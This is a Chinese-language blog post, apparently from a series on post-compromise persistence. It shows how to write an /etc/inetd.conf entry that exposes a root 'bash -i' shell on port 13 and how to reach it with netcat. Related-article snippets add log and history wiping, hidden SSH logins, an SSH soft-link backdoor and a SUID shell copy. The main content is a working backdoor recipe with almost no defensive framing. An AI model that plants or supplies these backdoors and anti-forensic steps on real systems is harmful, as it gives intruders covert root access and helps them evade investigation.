操作系统权限维持(十五)之Linux系统-inetd远程后门

最新推荐文章于 2024-05-15 16:28:08 发布
最新推荐文章于 2024-05-15 16:28:08 发布
阅读量545 收藏 3
点赞数 1
分类专栏: 操作系统权限维持 文章标签: linux 服务器 网络安全 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_64973687/article/details/129819183
版权
该系列文章详细介绍了在Windows和Linux操作系统中维持后门权限的各种方法,包括粘贴键、克隆账号、启动项、计划任务、系统服务等。特别地,文章提到了如何利用inetd配置创建远程后门,通过编辑inetd.conf文件并启动服务,可以实现远程连接并获取root用户权限。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

系列文章

操作系统权限维持(一)之Windows系统-粘贴键后门
操作系统权限维持(二)之Windows系统-克隆账号维持后门
操作系统权限维持(三)之Windows系统-启动项维持后门
操作系统权限维持(四)之Windows系统-计划任务维持后门
操作系统权限维持(五)之Windows系统-系统服务维持后门
操作系统权限维持(六)之Linux系统-定时任务后门
操作系统权限维持(七)之Linux系统-SUID后门
操作系统权限维持(八)之Linux系统-SSHKey后门
操作系统权限维持(九)之Linux系统-添加用户后门
操作系统权限维持(十)之Linux系统-SSH 软连接后门
操作系统权限维持(十一)之Linux系统-SSH Wrapper后门
操作系统权限维持(十二)之Linux系统-sudoers利用后门
操作系统权限维持(十三)之Linux系统- SSH Keylogger记录密码后门
操作系统权限维持(十四)之Linux系统- Strace监听SSH来源流量记录密码后门

inetd远程后门

inetd,也叫作“超级服务器”,就是监视一些网络请求的守护进程,其根据网络请求来调用相应的服务进程来处理连接请求。

inetd.conf则是inetd的配置文件。inetd.conf文件告诉inetd监听哪些网络端口,为每个端口启动哪个服务。

位置是/etc/inetd.conf 配置格式:[servicename] [socktype] [proto] [flags] [user] [server_path] [args] 在配置文件下写入以下内容:

daytime stream tcp nowait root /bin/bash bash -i

daytime服务(13端口) 套接字类型 协议类型 不等待  用户组     提供服务的程序
daytime             stream   tcp     nowait root     /bin/bash bash -i

首先我们编辑该文件,向文件中写入上诉的命令

vim /etc/inetd.conf

在这里插入图片描述

然后我们输入

inetd

启动服务

在这里插入图片描述

这样配置好了以后利用以下命令远程连接直接能拿到root用户身份

nc targetIP 13

在这里插入图片描述

网络安全从入门到精通(特别篇I):Linux安全事件应急响应之Linux应急响应基础必备技能
HACKONE的博客
04-10 901
awk 首先将每条日志中的IP抓出来,如日志格式被自定义过,可以 -F 定义分隔符和 print指定列;
网络安全自学教程》- Linux应急响应排查思路
热门推荐
wangyuxiang946的博客
05-29 5万+
结合实战案例逐步讲解Linux应急响应排查思路。
linux-wrapper跟inetd服务后门
渗透测试教程
03-10 631
通过本文,你将会学习如下6个linux痕迹隐藏技巧,祝师傅牛气冲天! 隐藏远程SSH登陆记录 清除当前的history记录 隐藏Vim的操作记录 隐藏文件修改时间 锁定文件 清除系统日志痕迹 隐藏远程SSH登陆记录 隐身登录系统,不会被w、last等指令检测到。 ssh -T root@192.0.0.1 /bin/bash -i -T表示不分配伪终端,/usr/bin/bash 表示在登录后调用bash命令 -i 表示是交互式shell 原理 w/last命令日志/var/log/wtmp 是utmp
Linux系统服务inetd
projectoflion123的专栏
07-29 8958
inetd进程介绍: inetd程序是一个Linux守护进程。您可能已经知道守护进程是一些特殊的程序:它们在被启动之后,自愿放弃对调用自己终端的控制权。守护进程与系统其余部分的接口只有依靠进程间通信(Interprocess Communication,IPC)通道、或者依靠向系统全局性日志文件(Log File)才能发送数据项。 inetd的角色是作为Telnet和FTP等与网络服务器相关的
linux权限提升——inetd服务后门
mingyqf的博客
02-19 1383
远程后门:利用/etc/inetd.conf 我们使用vi来修改/etc/inetd.conf文件 原文件: #chargendgramudpwaitrootinternal #discardstreamtcpnowaitrootinternal #discarddgramudpwaitrootinternal #daytimestreamtcpnowaitrootinternal 修改为: #discardstreamtcpnowaitrootinternal #discarddgramudpwaitro
Linux后门的两种姿势:suid shell与inetd后门
weixin_33755649的博客
03-10 291
前提:你现在已经是root用户, 想留一个后门系统环境:dawg:~# uname -a Linux dawg 2.4.20-1-386 #3 Sat Mar 22 12:11:40 EST 2003 i686 GNU/Linux1. SUID shell首先, 先切换成为root用户,并执行以下的命令:dawg:~# cp /bin/bash /.wootdawg:~#...
linux inetd
chengfangang的专栏
01-08 1007
http://xu20cn.blog.51cto.com/274020/65723 inetd (Internet 超级服务器 ) inetd是监视一些网络请求的守护进程,其根据网络请求来调用相应的服务进程来处理连接请求。它可以为多种服务管理连接,当 inetd 接到连接时,它能够确定连接所需的程序,启动相应的进程,并把 socket 交给它 (服务 socket 会作为程序的标准
linux系统安全
moRickyer的博客
07-27 2625
在贝尔实验室的UNIX实施文档的早期版本中,/etc表示是“其他(etcetera)目录”,因为从历史上看,这个目录是存放各种不属于其他目录的文件(然而,文件系统目录标准FSH限定/etc用于存放静态配置文件,这里不该存有二进制文件)。也称为“口令失效日”,简单理解就是,在密码过期后,用户如果还是没有修改密码,则在此字段规定的宽限天数内,用户还是可以登录系统的;字段相比较,当账户密码有效期快到时,系统会发出警告信息给此账户,提醒用户“再过n天你的密码就要过期了,请尽快重新设置你的密码!...
LINUX安全管理10道防线.pdf
09-07
Linux操作系统中,安全管理是至关重要的,因为Linux系统常常成为黑客的目标。本文将详细讲解如何构建10道防线来增强Linux系统的安全性。 1. 关闭无用端口:网络服务通常通过开放的端口提供,减少不必要的端口开放...
Linux系统安全防护加固
qq_40907977的博客
12-26 619
1、删除系统不需要的默认账号 # userdel lp # groupdel lp #passwd –l lp 如果下面这些系统默认帐号不需要的话,建议删除。 lp, sync news, uucp, games, bin、man 修改一些系统帐号的shell变量,例如uucp,ftp和news等,还有一些仅仅需要FTP功能的帐号,一定不要给他们设置/bin/bash或者/bin/sh等Sh...
linux命令inetd,inetd服务使用说明
weixin_34193397的博客
04-29 1175
启动rstatd服务,以便使用LoadRunner工具来监视Linux系统性能这里介绍如何在RedHatLinux中启动rstatd服务,以便使用LoadRunner工具来监视Linux系统的性能情况。首先介绍一下在IBM AIX系统中如何启动rstatd服务(因为这个比较简单,顺便可以认识一下Unix系统)。使用telnet以root用户的身份登录入AIX系统,在命令行提示符下输入:vi /et...
linux超级服务器inetd详解
Skylar
01-23 5370
1.引言: 它可以为多种服务管理连接,当 inetd 接到连接时,它能够确定连接所需的程序,启动相应的进程,并把 socket 交给它 (服务socket 会作为程序的标准输入、 输出和错误输出描述符)。 使用 inetd 来运行那些负载不重的服务有助于降低系统负载,因为它不需要为每个服务都启动独立的服务程序。   一般说来, inetd 主要用于启动其它服务程序,但它也有能力直接处理某些
Linux后门大全-inetd后门(一)
qq_42465440的博客
08-17 565
inetd后门介绍
linux命令inetd,配置inetd
weixin_29387991的博客
04-29 678
inetd服務是tip: 這幾個參數是用tab鍵分開的,這個inetd.conf文件是inetd服務器的配置文件,配置好了之後需要重啟一下才能生效首先開機啟動的時候,rc啟動inetd服務,此服務會讀取inetd.conf文件中的每一行來進行監聽,比如這一行,他會讀取第一個參數 ma,發現是ma服務,然後它會在 /etc/接著有讀取了 第二第三個參數, 之後創建socket,bind,listen...
Linux内核权限维持,linux权限维持
weixin_34385935的博客
04-29 215
ssh软连接后门SSH服务默认使用PAM进行身份验证PAM是Linux系统中的一个独立API,它提供了各种验证模块以供其它程序调用,从而完成身份认证的功能pam验证过程中,只要pam_rootok模块检测uid为0,即可成功认证登录,通过软连接文件名的方式(比如su),可以建立ssh后门利用靶机上执行ln -sf /usr/sbin/sshd /tmp/su;/tmp/su -oport=1234...
三、网络服务器inetd/xinetd服务
最新发布
一只小鲤鱼~的博客
05-15 1362
inetd和xinetd都是Unix/Linux系统上的守护进程,用于管理网络服务。将inetd/xinetd程序打开,绑定、监听和接受来自服务器每一个端口的请求。当有客户端连接的时候,inted/xinted会根据客户端信息到达的端口号判断请求的是哪一个服务,接着inetd/xinetd会调用服务器程序并把socket传给它。inetd(Internet service daemon)是最早的网络服务管理器,它在系统启动时启动并监听指定的网络端口。
linux排查木马后门之定时任务计划
网站安全专家
09-08 476
那如果解除的话大家要删除,不删除的话,在我的实验里它是不允许比如咱们清空这个文件,那么它不允许所有用户建立就是任务了。那如何创建定时任务,很简单,我们通过这个命令,每一个用户都可以创建自己的定时任务,使用一个编辑器打开它,这里就可以创建一个定时任务,定时任务保存的路径一共有这么几个。这里就不用说了,它也是一样的,只是他们分了一下就是每小时执行的文件夹,这是每天执行的文件夹,咱们进一个每个月的,比如这里有一个脚本,那么每个月都会执行一次,看一下扩展知识,我们任意用户都可以创建定时任务,是不是很危险。
操作系统权限维持(六)之Linux系统-定时任务后门
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
03-27 841
使用crontab命令进行反弹shell。crontab命令用于设置周期性被执行的指令。新建shell脚本,利用脚本进行反弹。我们可以使用crontab -e或者vim /etc/crontab添加计划任务。kali机器收到反弹shell。设置定时任务为每分钟执行一次。kali机器开启监听。
mssql 计划怎每隔n秒_计划任务后门 | Linux 后门系列
weixin_39925813的博客
11-29 192
Linux 计划任务是一项服务,由 cron 工具来完成,主要目的就是在无需人工干预的情况下运行作业PS: 功能较为简单的at命令在Ubuntu 16.04中已经不自带了0x01 cron服务简介我们来寻找一下这个工具的地址吧!既然是一项服务,那么启动、停止、查询状态等操作相信大家都会了默认情况下Ubuntu 16.04 中 cron 服务是默认开机自启的这个服务的使用也是比较简单,cr...
Linux操作系统原理:Apache安装与配置详解
"Linux操作系统原理1" 在深入探讨Linux操作系统原理之前,我们首先关注的是Linux环境下的Web服务器——Apache。Apache是世界上最广泛使用的Web服务器软件,它具有高度的可配置性和稳定性,使得它能够处理各种复杂的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

怰月

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值